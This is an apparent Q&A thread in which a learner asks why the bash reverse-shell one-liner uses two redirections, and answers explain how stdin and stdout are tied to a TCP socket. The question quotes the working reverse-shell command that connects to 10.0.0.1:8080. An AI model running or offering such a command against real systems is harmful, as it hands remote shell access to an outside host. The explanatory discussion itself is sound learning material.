# Why are there two file redirections in the bash reverse shell?

Tags: bash, reverse-shell

I've been trying to gain a greater understanding of how reverse shells work and I've been deciphering the bash one:

```
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
```

I understand that the first redirection (`>&`) redirects stdout and stderr, but why is there a need for the second one?

Comment: It's redirecting stdin to the socket as well.

Answer (score 0):

This redirects stdin (FD: 0) to come from the socket as well currently on stdout (FD: 1)

Answer (score 0):

It connects standard input and standard output to the same device. This allows two-way communication to the host where the shell is running.

See [this article](https://mywiki.wooledge.org/BashFAQ/055) for details.

Comment: So, bash sends stdout and stderr to the tcp socket (first redirection:>&), then stdin is redirected to where stdout is already going (second redirection:0>&1)?